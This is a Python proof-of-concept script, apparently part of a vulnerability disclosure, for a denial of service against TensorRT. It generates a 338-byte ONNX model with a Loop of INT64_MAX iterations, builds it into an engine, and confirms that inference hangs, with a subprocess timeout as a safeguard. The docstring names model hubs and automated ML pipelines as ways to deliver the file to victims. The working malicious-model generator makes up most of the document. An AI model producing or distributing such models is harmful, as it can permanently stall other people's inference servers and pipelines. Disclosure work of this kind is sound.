File size: 8,887 Bytes
2fc3065
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
"""
VULN-003 PoC: TensorRT Denial of Service via ONNX Loop with INT64_MAX Iterations

A crafted ONNX model (338 bytes) containing a Loop operator with max_trip_count
set to INT64_MAX (9,223,372,036,854,775,807) compiles into a valid TensorRT
engine (20,252 bytes) that hangs indefinitely during inference.

Attack vectors:
1. ONNX model on model hub -> victim compiles to engine -> inference hangs
2. Pre-compiled engine file on model hub -> victim loads -> inference hangs
3. Automated ML pipeline ingests malicious model -> entire pipeline stalls

Impact:
- Permanent denial of service for TensorRT inference servers
- No timeout mechanism in execute_async_v3() — hangs until process is killed
- Tiny file size (338 bytes ONNX / 20KB engine) makes distribution trivial
- Affects Triton Inference Server, TensorRT-LLM, any TRT-based pipeline
"""
import os
import sys
import time
import subprocess
import numpy as np
import onnx
from onnx import helper, TensorProto, numpy_helper

POC_DIR = os.path.dirname(os.path.abspath(__file__))


def create_loop_dos_model():
    """Create minimal ONNX model with Loop(INT64_MAX)."""
    # Loop body: Relu (trivial computation)
    body_input = helper.make_tensor_value_info('i', TensorProto.INT64, [])
    body_cond_in = helper.make_tensor_value_info('cond_in', TensorProto.BOOL, [])
    body_x_in = helper.make_tensor_value_info('x_in', TensorProto.FLOAT, [1, 4])
    body_cond_out = helper.make_tensor_value_info('cond_out', TensorProto.BOOL, [])
    body_x_out = helper.make_tensor_value_info('x_out', TensorProto.FLOAT, [1, 4])

    relu = helper.make_node('Relu', ['x_in'], ['x_out'])
    identity_cond = helper.make_node('Identity', ['cond_in'], ['cond_out'])
    body = helper.make_graph(
        [relu, identity_cond], 'loop_body',
        [body_input, body_cond_in, body_x_in],
        [body_cond_out, body_x_out]
    )

    # Main graph
    X = helper.make_tensor_value_info('input', TensorProto.FLOAT, [1, 4])
    Y = helper.make_tensor_value_info('output', TensorProto.FLOAT, [1, 4])

    # INT64_MAX = 9,223,372,036,854,775,807
    max_trip = numpy_helper.from_array(
        np.array(0x7FFFFFFFFFFFFFFF, dtype=np.int64), 'max_trip'
    )
    cond_init = numpy_helper.from_array(np.array(True, dtype=bool), 'cond_init')

    loop = helper.make_node(
        'Loop', ['max_trip', 'cond_init', 'input'], ['output'],
        body=body
    )

    graph = helper.make_graph([loop], 'loop_dos', [X], [Y], [max_trip, cond_init])
    model = helper.make_model(graph, opset_imports=[helper.make_opsetid('', 13)])
    model.ir_version = 7
    return model


def build_engine(model_path, engine_path):
    """Build TensorRT engine from ONNX model."""
    import tensorrt as trt

    logger = trt.Logger(trt.Logger.WARNING)
    builder = trt.Builder(logger)
    network = builder.create_network(
        1 << int(trt.NetworkDefinitionCreationFlag.EXPLICIT_BATCH)
    )
    parser = trt.OnnxParser(network, logger)

    if not parser.parse_from_file(model_path):
        for i in range(parser.num_errors):
            print(f"  Parse error: {parser.get_error(i)}")
        return False

    config = builder.create_builder_config()
    config.set_memory_pool_limit(trt.MemoryPoolType.WORKSPACE, 1 << 24)

    serialized = builder.build_serialized_network(network, config)
    if not serialized:
        print("  Build failed")
        return False

    with open(engine_path, 'wb') as f:
        f.write(bytes(serialized))
    return True


def test_inference_subprocess(engine_path, timeout=30):
    """Run inference in subprocess and measure hang time."""
    script = f'''
import tensorrt as trt, numpy as np, torch, time, sys

with open(r"{engine_path}", "rb") as f:
    data = f.read()

logger = trt.Logger(trt.Logger.ERROR)
runtime = trt.Runtime(logger)
engine = runtime.deserialize_cuda_engine(data)
if not engine:
    print("DESER_FAIL")
    sys.exit(1)

context = engine.create_execution_context()
device = torch.device("cuda:0")
inp = torch.randn(1, 4, device=device)
out = torch.empty(1, 4, device=device)
context.set_tensor_address("input", inp.data_ptr())
context.set_tensor_address("output", out.data_ptr())

stream = torch.cuda.current_stream()
print("INFERENCE_STARTED")
sys.stdout.flush()
start = time.time()
context.execute_async_v3(stream.cuda_stream)
stream.synchronize()
elapsed = time.time() - start
print(f"INFERENCE_DONE time={{elapsed:.1f}}s")
'''
    start = time.time()
    try:
        r = subprocess.run(
            [sys.executable, "-c", script],
            capture_output=True, text=True, timeout=timeout
        )
        elapsed = time.time() - start
        return False, elapsed, r.stdout.strip(), r.returncode
    except subprocess.TimeoutExpired:
        elapsed = time.time() - start
        return True, elapsed, "TIMEOUT", -1


def main():
    print("=" * 70)
    print("VULN-003: TensorRT Inference DoS via ONNX Loop(INT64_MAX)")
    print("=" * 70)

    # Step 1: Create malicious ONNX model
    model = create_loop_dos_model()
    onnx_path = os.path.join(POC_DIR, "dos_loop.onnx")
    with open(onnx_path, 'wb') as f:
        f.write(model.SerializeToString())

    onnx_size = os.path.getsize(onnx_path)
    print(f"\n[1] Malicious ONNX model: {onnx_path}")
    print(f"    Size: {onnx_size} bytes")
    print(f"    Loop max_trip_count: {0x7FFFFFFFFFFFFFFF:,} (INT64_MAX)")
    print(f"    Loop body: single Relu operation")

    # Step 2: Build TensorRT engine
    engine_path = os.path.join(POC_DIR, "dos_loop.engine")
    print(f"\n[2] Building TensorRT engine...")
    if not build_engine(onnx_path, engine_path):
        print("    ERROR: Engine build failed")
        sys.exit(1)

    engine_size = os.path.getsize(engine_path)
    print(f"    Engine: {engine_path}")
    print(f"    Size: {engine_size} bytes")
    print(f"    Build completed normally — no error, no warning")

    # Step 3: Baseline — normal model inference
    print(f"\n[3] Baseline: Normal model inference")
    baseline_onnx = os.path.join(POC_DIR, "normal_loop.onnx")

    # Normal loop with 10 iterations
    body_input = helper.make_tensor_value_info('i', TensorProto.INT64, [])
    body_cond_in = helper.make_tensor_value_info('cond_in', TensorProto.BOOL, [])
    body_x_in = helper.make_tensor_value_info('x_in', TensorProto.FLOAT, [1, 4])
    body_cond_out = helper.make_tensor_value_info('cond_out', TensorProto.BOOL, [])
    body_x_out = helper.make_tensor_value_info('x_out', TensorProto.FLOAT, [1, 4])
    relu = helper.make_node('Relu', ['x_in'], ['x_out'])
    id_cond = helper.make_node('Identity', ['cond_in'], ['cond_out'])
    body = helper.make_graph([relu, id_cond], 'body',
                              [body_input, body_cond_in, body_x_in],
                              [body_cond_out, body_x_out])
    X = helper.make_tensor_value_info('input', TensorProto.FLOAT, [1, 4])
    Y = helper.make_tensor_value_info('output', TensorProto.FLOAT, [1, 4])
    trip = numpy_helper.from_array(np.array(10, dtype=np.int64), 'max_trip')
    cond = numpy_helper.from_array(np.array(True, dtype=bool), 'cond_init')
    loop = helper.make_node('Loop', ['max_trip', 'cond_init', 'input'], ['output'], body=body)
    graph = helper.make_graph([loop], 'normal', [X], [Y], [trip, cond])
    normal_model = helper.make_model(graph, opset_imports=[helper.make_opsetid('', 13)])
    normal_model.ir_version = 7
    with open(baseline_onnx, 'wb') as f:
        f.write(normal_model.SerializeToString())

    baseline_engine = os.path.join(POC_DIR, "normal_loop.engine")
    build_engine(baseline_onnx, baseline_engine)

    hung, elapsed, out, rc = test_inference_subprocess(baseline_engine, timeout=15)
    print(f"    Normal model (10 iterations): {out} ({elapsed:.1f}s)")

    # Step 4: DoS inference
    print(f"\n[4] DoS inference (will hang for 30 seconds then be killed)")
    hung, elapsed, out, rc = test_inference_subprocess(engine_path, timeout=30)
    if hung:
        print(f"    TIMEOUT after {elapsed:.1f}s — INFERENCE IS HANGING")
        print(f"    [!!!] DoS CONFIRMED")
    else:
        print(f"    Inference completed: {out} ({elapsed:.1f}s)")

    # Summary
    print(f"\n{'='*70}")
    print("VULNERABILITY SUMMARY")
    print(f"{'='*70}")
    print(f"[!!!] TensorRT inference hangs indefinitely on Loop(INT64_MAX)")
    print(f"[!!!] ONNX model size: {onnx_size} bytes")
    print(f"[!!!] Engine file size: {engine_size} bytes")
    print(f"[!!!] Both formats can be used as DoS weapons")
    print(f"[!!!] No timeout in execute_async_v3() — runs until process killed")
    print(f"[!!!] Loop iterations: 9,223,372,036,854,775,807 (INT64_MAX)")
    print(f"[!!!] Even at 1 billion iterations/sec, would take 292 YEARS")

    # Cleanup temp files
    for f in [baseline_onnx, baseline_engine]:
        if os.path.exists(f):
            os.remove(f)


if __name__ == "__main__":
    main()